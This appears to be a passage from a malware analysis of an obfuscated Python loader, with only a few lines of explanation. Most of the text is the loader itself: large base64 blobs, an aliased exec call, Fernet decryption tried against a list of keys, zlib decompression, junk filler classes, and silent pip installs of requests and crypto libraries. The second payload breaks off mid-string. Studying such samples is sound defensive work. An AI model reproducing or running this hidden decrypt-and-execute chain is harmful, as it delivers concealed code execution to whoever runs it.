dWNUTXRSVVZGZDAxcGJWQllZa2xOVTBVM04yNUJWQzFwZW5KRE9HdERhRGQzVFhNemFTMWZSRlZsUzI5d01IZFVaR1pZY1dGR1UyZDZTREJ6U0RaVkxVRXlVRlo1WVZZeVpXeE9OVTlmWlhKV1oyOHhTVmhITW1VNWNVaFdkbmRhYW5OSlZGRm9aMVV0UTNSVmRIZDRhRFZMVDNkaU5HcHpiRTg0VlhST05ETlFTV1JhVUc5eWIwWTVUVEEyZVV4MGRGbE5TM0ZqTVdwd2NHNTRZVmRpVTBoeldtOVRNM2swU0hwR01uQnRYMjF2VG1SRU9GOWlTamQ1UkdzMGJtNVBiMHBJTWpCM09HbHhUekJhTUdsVVdtbGpOblJsZGtSWVNuUk1iakl3V1ZvNGVrNVdYM05QYWtoWk5HMDRRVlZ3TTI5b0xXTjJjMWxVZUU1RFZGaHJSVk5SV2twMGJrazFTMEpHTUdaZlUxcE5UMVpaV1doMWVrTnpSa1pPUm5vMmJHNWZVSE15YWpGd1YzUk9VVWRSZDJsUlEwdHJXVk5PWm14aFUwaHhVbkJ6T1hsSVEwcFJUbWRuWjJacVRYVjNNbVY1Y1ZvNWNrTTBXRWhuTlhobFNWZzBZMmxhZFMxRFdWVmpOblJEVWxKVmJuQnJWVk5yUjA5aE5tTm1Wa3AzUzFsMVdFWmtOVXBhT1dadlQyaGxVWGc1Y0U1bFNEaFVkMnhvTVc5eVVuVklWa2RVV0U1Tk5HRTNkMFJPVm1kcGQwTjZPVlphV2tScmNYUnJiWEJCYXpBNE5WSk5WMjlsV2s1cFFsWTVaRUo1WjJndE1YaGxhbkI2UkZsMlkxbFdaREpaZFhoQ2RVWllaalJoVG5GeFpsTlVlVEJWWTFBM01rTTJSMDl2Ym1WelZUWXdNa0pEZFV0dk5VdHVaWEZ3Y1hCYVFsWktkRXhoYUdaalRrSXpORzlrZEdvd1JYaFdNMHhmTjFWV1psSnhjMmhKY0Vzd2RuUm9lV3RUYVZaUWFVUjRkbGxLVFhNNFVtNUljR3N5VURkNVNVVlFNazFNTlRkMVR6WllWa1ZYVWpoVWR6RlVVMVEzWkZsS1ZYQlZiUzFCWTJGSFkxUlNkWFJpUWpWMWFqVkRRMGs0WldWaVluUldabGhtTkdKV2RFeDZVMDk2U0cxdGJYTkViWFJzTWtGTWRrVnNZVUZ3WWpoMFdYUkVlbFpTWVRZM1VFd3pVV1ZhYUhKMFRFVXpUVXRwVkhaNGJUSjJNek5LZVhaeFpqaEtPRlJHVDNBellUbHVTRFoyTlMxV2R6WkxMVXh1Vkd0Ulp6aDRja0ZCVW5OSE5EWkRhMWswYkhKZk1HUXROMTlPWmpKV1dWSkdlRjlXTFV0UWQyNWxWblpqWlZveldUUjJRM2h2UmtReWF5MWlkV2MwZVdWYWNYUkZZMGhzUWxNNFJYaEdUMWhKYmtsVmQwSldRM0pDY1MwNWFVMUJkRlI2ZWt0NWVHUlRjWFF6YkV4aGRFcERNMmhtTVdwTkxVRmlaRWhyTm5kdFJ6YzVNRzFFZHpoWmFsRllMVk14YUMweVQxVnhhWGM0UWpVeldtWTRTekJQZWt0U1NVeEVMWGsyUWpGeGR6TlRjRGN6YW0xemRrdExRM0U0VVRRelRUVlRTR1JSTVRnNFdVVlRXWHBpUlVsNFNuSk9jRlJSY0ZKdk9IVkpWa2R2ZDJkZllXTnNjakJUUlRaSk9HNVhhbkpTVjBWbk1VRnhkWGROZDIxeldWcFZTRTVGV0d0RVpWQmpPR2xuVlcxRVEyUXdRbGhoTVdWMGVFRlBSRVp3ZWtKTFZ6RXRPR05UYlVSa05ETXRNVEo1YTBSc2F6UnVVMmxyUkVzd1gwbExVV2xNUlhOUVkzYzVZbTgzU21ZeGJrdEZRbU55YTFaeU5tRjZkMVl5ZVY5VGFYVk9iVGwwV1RGUU9VeHNTbEJ0TWtWSloyaDFhME14UzAweVVYaEVObmQxZGw5M2JrNXFjR3c0Y0ZFeWJHSkhSRTFTUldwMk9ETjRkV00xZFZCSldDMXlVbU4xWlRCdWVtczRaR0kyUlhabGEwTjJSMFJsVG5OQ1VVdGtSRUoxWHpaUFl5MU5kRVV0UTJneWVFbHdTSHBxVjBrMlJHVTNNV2c1UVhWc1EzTm1iRm8zVFhGc2RYbGthRTAyUkhSS2RFMHRXbUV4VDJWcmFrOXVVbXhtWDJNNU5rSmlOVWxHYTNKR01HTXhNVmsxVkV4VVQwWjBVMEZqVDJSbFYwWk1OSHBXTkRaaVNFbzJOMU5hWTFSUU16Vmpha2RGY0UxRGFtTkZjVUZoZGxoVmFHSndNMnhJUVVoUE1pMWFSVTQxUms5c1kzUlBhbXRhTkZKbmFHZ3lObWcwUlhwRFIwazBXRFYzVnpkUmVFb3dRME16U0haTlMwWk5kVk5xVmpaTmVFMXFSMWxDZVRGS1l6SlhlbnBhT0c4eFNGbEpZalJMVGpSVE1GTnRVelV6U0ZVNVExSTFZbU5aTFVwblNYQllOVkp6TVUwNE5rbGhTMjEwUzNoZlNURmtWamxKTUdaelExUkdhWFZpYURGRmFVNUZNV1V5IgpDU2VsWUZOcFlBWDRqaGZNaVVFUUdXUTNNb2NjaFRETXpvalBXRCA9IGV4ZWMKZW5jcnlwdGVkX2NvZGUgPSBiYXNlNjQuYjY0ZGVjb2RlKGVuY29kZWRfY29kZSkKeyd1c2VybmFtZSc6ICdzemVDanhhJywgJ2FnZSc6IDI0fQpPSzV6cHJPSkhHID0gNTU4NzU4NTkKY2xhc3MgZUdsYVNMVVdkRjoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBSRnNyWlFkdFdROgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpUaTJYN1k1MjFFID0gMjM2MDA3NDUKQWJKRG1HOUI4dSA9IDE5OTM1MzU4CmNsYXNzIHNkQWtVUThjSFQ6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhClsiJ2dmSGFZZGFmRVonIiwgIid5MlJ4ZnZ1TVcwJyIsICInV0NUQXhiWm5EWiciLCAiJ0RYNk5WUHIxcFMnIiwgIidwRTlmOHd4aGxKJyJdCmNsYXNzIG9iTm9EdGpSeDM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUFZVTFR6aDg5YToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgbXJLaWRwamljdzoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeFY0NzhqVVFCdCA9IDIzNzQ3NTI2CmNsYXNzIFM1NTJ1WDhJbHM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeDZReVFUWTRDQSA9IDc4MzExNzAKY2xhc3Mgd0RvQUJ6WlE0eToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpaSmphTXp5WW1qID0gMzM0OTc2MjkKUXJnMkFjRUsxOCA9IDExMTkwNDMwCmNsYXNzIGtJMlBPT21uWjY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIE9tbGNEWU1qZUs6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKJ2hVY28yYlNTWDMnClFzdEhEbWJCMmUgPSAyOTQ3ODY1Nwp2ZUphTGVYYVRnID0gODYxNDU3ODQKeWNTNmRpVkVWSSA9IDYxMTE5NTA4CnMgPSBbYid6VHNrb1lHbTY4VnJTaU9NNko5VzBQcXlLVGZTeXJhTTBOeWRWbUp2TV9rPScsIGIncGNEMjNiUlFUTDFNcUxTODROZFBzaVBkWUpsd2JUYWFsNkptdWx6VHE0az0nLCBiJzlFQlFORGpteTByR1hDYlZnVm5yZ0ZGc0FIazRZZTFNOHkxR1NJeDlDUFk9JywgYic2NjNSbks1bDBNUXpld2ZwQVFmWWhKYkwzcDdaUm9SLWo3STNEa1hpVUlrPScsIGInSTVBcnhrZ2ZvMkU1NlZCVmN0RmpKLXBGa2VCYlFnNlFYTXVHLWdOZ3FxND0nLCBiJ2VYUDFzS2ZrVEU5UE5rV1I4ckE5anpKcXVuODB5TVlQcnpNTWk2NUpRcHc9JywgYic1NlM5U3Y3elVQTDcxdzZOMk9UU3d4dkZsX2EtNXp2c042cnhRSTk3VVdVPScsIGInZ1pjUk1hVmZ0TWdfRjlFNHROUV9ldEFSN19QS1RfdlZmV3dXa01TeERRYz0nLCBiJy1YbWFLTDR1bzRwMGdNNUFSUVp0eGpaXzVlY0sxdzUzQUVrV3VpV0RJelE9JywgYidpa05mQnRyclgtOUVCSTNpS3pXbkJKVzV3Tk52aThyTTRvVDlCTHFESk53PScsIGIndUVpa0hhSEFYMUIyMGFCX2JjUXdVQTBhTzIxQWktcmdZQXFHZkt4SEtKQT0nLCBiJ2Rlb0hUd052d1RPdVFqb3k1b2g5ak5fWlFsTGJWQ3Z3STQ3RDNzUXQ4VUE9JywgYid4dWFEN0Jxd3JlbmlLWkF2Qk8zOE1PMjUwb080MEhYYm94aFU4LS02WVEwPScsIGInWDVHZllfenVrSURQS3h5em1NWUZrcHMtQXY4QW8yVFFEUG1ja3JqYjNaUT0nLCBiJ0NBT0Q3WFNXNGUtT04zM3V6NV84aDZSWmhvckRsS2c3OThlMVJjRVlTbG89JywgYidkTXBod2x3TzZRaF9GQ2RiTXpzZW9ac1drUVdQRnRHeDhWU2lGQU4yU1NvPScsIGIncTROZmNSaWVMSUtueUJ3RkVoVXhaY1JfOEEzQkZTX25fY0lFOHNGWDhhND0nLCBiJ2hMZkFQUjA2eHVvNTQ1cUpsemxZa281ZjlLS3VYT0JyQ0JOZ3pydVRWMTQ9J10KZm9yIGtleSBpbiBzOgogICAgdHJ5OgogICAgICAgIGRlY3J5cHRlZF9jb2RlID0gaFhSR0RHQ1BUclJ2Ynp3YVVsRmJtUUNvRDhPQ1k0cmpZQ094TjUoa2V5LmRlY29kZSgidXRmLTgiKSkuZGVjcnlwdChlbmNyeXB0ZWRfY29kZSkKICAgICAgICBicmVhawogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgIHBhc3MKeyd1c2VybmFtZSc6ICdzemVDanhhJywgJ2FnZSc6IDI0fQpPSzV6cHJPSkhHID0gNTU4NzU4NTkKY2xhc3MgZUdsYVNMVVdkRjoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBSRnNyWlFkdFdROgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpUaTJYN1k1MjFFID0gMjM2MDA3NDUKQWJKRG1HOUI4dSA9IDE5OTM1MzU4CmNsYXNzIHNkQWtVUThjSFQ6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhClsiJ2dmSGFZZGFmRVonIiwgIid5MlJ4ZnZ1TVcwJyIsICInV0NUQXhiWm5EWiciLCAiJ0RYNk5WUHIxcFMnIiwgIidwRTlmOHd4aGxKJyJdCmNsYXNzIG9iTm9EdGpSeDM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUFZVTFR6aDg5YToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgbXJLaWRwamljdzoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeFY0NzhqVVFCdCA9IDIzNzQ3NTI2CmNsYXNzIFM1NTJ1WDhJbHM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeDZReVFUWTRDQSA9IDc4MzExNzAKY2xhc3Mgd0RvQUJ6WlE0eToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpaSmphTXp5WW1qID0gMzM0OTc2MjkKUXJnMkFjRUsxOCA9IDExMTkwNDMwCmNsYXNzIGtJMlBPT21uWjY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIE9tbGNEWU1qZUs6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKJ2hVY28yYlNTWDMnClFzdEhEbWJCMmUgPSAyOTQ3ODY1Nwp2ZUphTGVYYVRnID0gODYxNDU3ODQKeWNTNmRpVkVWSSA9IDYxMTE5NTA4CmRlY29tcHJlc3NlZF9jb2RlID0gemxpYi5kZWNvbXByZXNzKGRlY3J5cHRlZF9jb2RlKS5kZWNvZGUoJ3V0Zi04JykKQ1NlbFlGTnBZQVg0amhmTWlVRVFHV1EzTW9jY2hURE16b2pQV0QoZGVjb21wcmVzc2VkX2NvZGUpCnsndXNlcm5hbWUnOiAnc3plQ2p4YScsICdhZ2UnOiAyNH0KT0s1enByT0pIRyA9IDU1ODc1ODU5CmNsYXNzIGVHbGFTTFVXZEY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUkZzclpRZHRXUToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKVGkyWDdZNTIxRSA9IDIzNjAwNzQ1CkFiSkRtRzlCOHUgPSAxOTkzNTM1OApjbGFzcyBzZEFrVVE4Y0hUOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpbIidnZkhhWWRhZkVaJyIsICIneTJSeGZ2dU1XMCciLCAiJ1dDVEF4YlpuRFonIiwgIidEWDZOVlByMXBTJyIsICIncEU5Zjh3eGhsSiciXQpjbGFzcyBvYk5vRHRqUngzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIFBWVUxUemg4OWE6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIG1yS2lkcGppY3c6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCnhWNDc4alVRQnQgPSAyMzc0NzUyNgpjbGFzcyBTNTUydVg4SWxzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCng2UXlRVFk0Q0EgPSA3ODMxMTcwCmNsYXNzIHdEb0FCelpRNHk6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKWkpqYU16eVltaiA9IDMzNDk3NjI5ClFyZzJBY0VLMTggPSAxMTE5MDQzMApjbGFzcyBrSTJQT09tblo2OgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBPbWxjRFlNamVLOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCidoVWNvMmJTU1gzJwpRc3RIRG1iQjJlID0gMjk0Nzg2NTcKdmVKYUxlWGFUZyA9IDg2MTQ1Nzg0CnljUzZkaVZFVkkgPSA2MTExOTUwOAo="
CSelYFNpYAX4jhfMiUEQGWQ3MocchTDMzojPWD(base64.b64decode(PZcTmMLNDhGxIyuHWAnzp4HJYLcvrDIwkJzqlN))
Let’s break down it:
- With this piece of code, it will check whether required libraries are installed or not, if not then install:
requirements = [
["requests", "requests"],
["Cryptodome.Cipher", "pycryptodomex" if not 'PythonSoftwareFoundation' in executable else 'pycryptodome']
]
for modl in requirements:
try:
import_module(module[0])
except:
subprocess.Popen(executable + " -m pip install " +modl[1], shell=True)
time.sleep(3)
from json import loads, dumps
from urllib.request import Request, urlopen
try:
from cryptography.fernet import Fernet
except:
subprocess.run("python -m pip install cryptography")
try:
from cryptography.fernet import Fernet
except:
subprocess.run("python -m pip install cryptodomex", shell=True)
try:
import requests
except:
subprocess.run("python -m pip install requests", shell=True)
try:
from Cryptodome.Cipher import AES
except:
subprocess.Popen(executable + " -m pip install pycryptodome ", shell=True)
from Crypto.Cipher import AES
- Next, it will decode a base64 string which contains another payload:
PZcTmMLNDhGxIyuHWAnzp4HJYLcvrDIwkJzqlN="CmltcG9ydCB0aW1lCnsndXNlcm5hbWUnOiAnc3plQ2p4YScsICdhZ2UnOiAyNH0KT0s1enByT0pIRyA9IDU1ODc1ODU5CmNsYXNzIGVHbGFTTFVXZEY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUkZzclpRZHRXUToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKVGkyWDdZNTIxRSA9IDIzNjAwNzQ1CkFiSkRtRzlCOHUgPSAxOTkzNTM1OApjbGFzcyBzZEFrVVE4Y0hUOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpbIidnZkhhWWRhZkVaJyIsICIneTJSeGZ2dU1XMCciLCAiJ1dDVEF4YlpuRFonIiwgIidEWDZOVlByMXBTJyIsICIncEU5Zjh3eGhsSiciXQpjbGFzcyBvYk5vRHRqUngzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIFBWVUxUemg4OWE6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIG1yS2lkcGppY3c6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCnhWNDc4alVRQnQgPSAyMzc0NzUyNgpjbGFzcyBTNTUydVg4SWxzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCng2UXlRVFk0Q0EgPSA3ODMxMTcwCmNsYXNzIHdEb0FCelpRNHk6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKWkpqYU16eVltaiA9IDMzNDk3NjI5ClFyZzJBY0VLMTggPSAxMTE5MDQzMApjbGFzcyBrSTJQT09tblo2OgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBPbWxjRFlNamVLOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCidoVWNvMmJTU1gzJwpRc3RIRG1iQjJlID0gMjk0Nzg2NTcKdmVKYUxlWGFUZyA9IDg2MTQ1Nzg0CnljUzZkaVZFVkkgPSA2MTExOTUwOAppbXBvcnQgemxpYgppbXBvcnQgYmFzZTY0CnsndXNlcm5hbWUnOiAnc3plQ2p4YScsICdhZ2UnOiAyNH0KT0s1enByT0pIRyA9IDU1ODc1ODU5CmNsYXNzIGVHbGFTTFVXZEY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUkZzclpRZHRXUToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKVGkyWDdZNTIxRSA9IDIzNjAwNzQ1CkFiSkRtRzlCOHUgPSAxOTkzNTM1OApjbGFzcyBzZEFrVVE4Y0hUOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpbIidnZkhhWWRhZkVaJyIsICIneTJSeGZ2dU1XMCciLCAiJ1dDVEF4YlpuRFonIiwgIidEWDZOVlByMXBTJyIsICIncEU5Zjh3eGhsSiciXQpjbGFzcyBvYk5vRHRqUngzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIFBWVUxUemg4OWE6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIG1yS2lkcGppY3c6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCnhWNDc4alVRQnQgPSAyMzc0NzUyNgpjbGFzcyBTNTUydVg4SWxzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCng2UXlRVFk0Q0EgPSA3ODMxMTcwCmNsYXNzIHdEb0FCelpRNHk6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKWkpqYU16eVltaiA9IDMzNDk3NjI5ClFyZzJBY0VLMTggPSAxMTE5MDQzMApjbGFzcyBrSTJQT09tblo2OgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBPbWxjRFlNamVLOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCidoVWNvMmJTU1gzJwpRc3RIRG1iQjJlID0gMjk0Nzg2NTcKdmVKYUxlWGFUZyA9IDg2MTQ1Nzg0CnljUzZkaVZFVkkgPSA2MTExOTUwOApmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSwgc3RkZXJyCgoKdHJ5OgogICAgaW1wb3J0IGNyeXB0b2dyYXBoeQpleGNlcHQgSW1wb3J0RXJyb3I6CiAgICBzdWJwcm9jZXNzLnJ1bigncHl0aG9uIC1tIHBpcCBpbnN0YWxsIGNyeXB0b2dyYXBoeScsIHNoZWxsPVRydWUpCiAgICBmcm9tIGNyeXB0b2dyYXBoeS5mZXJuZXQgaW1wb3J0IEZlcm5ldAoKaW1wb3J0IHN1YnByb2Nlc3MKZnJvbSBpbXBvcnRsaWIgaW1wb3J0IGltcG9ydF9tb2R1bGUKCnJlcXVpcmVtZW50cyA9IFsKICAgIFsicmVxdWVzdHMiLCAicmVxdWVzdHMiXSwKICAgIFsiQ3J5cHRvZG9tZS5DaXBoZXIiLCAicHljcnlwdG9kb21leCIgaWYgbm90ICdQeXRob25Tb2Z0d2FyZUZvdW5kYXRpb24nIGluIGV4ZWN1dGFibGUgZWxzZSAncHljcnlwdG9kb21lJ10KXQpmb3IgbW9kbCBpbiByZXF1aXJlbWVudHM6CiAgICB0cnk6CiAgICAgICAgaW1wb3J0X21vZHVsZShtb2R1bGVbMF0pCiAgICBleGNlcHQ6CiAgICAgICAgc3VicHJvY2Vzcy5Qb3BlbihleGVjdXRhYmxlICsgIiAtbSBwaXAgaW5zdGFsbCAiICttb2RsWzFdLCBzaGVsbD1UcnVlKQogICAgICAgIHRpbWUuc2xlZXAoMykKCmltcG9ydCByZXF1ZXN0cwoKZnJvbSBjcnlwdG9ncmFwaHkuZmVybmV0IGltcG9ydCBGZXJuZXQgYXMgaFhSR0RHQ1BUclJ2Ynp3YVVsRmJtUUNvRDhPQ1k0cmpZQ094TjUKCnRyeToKIC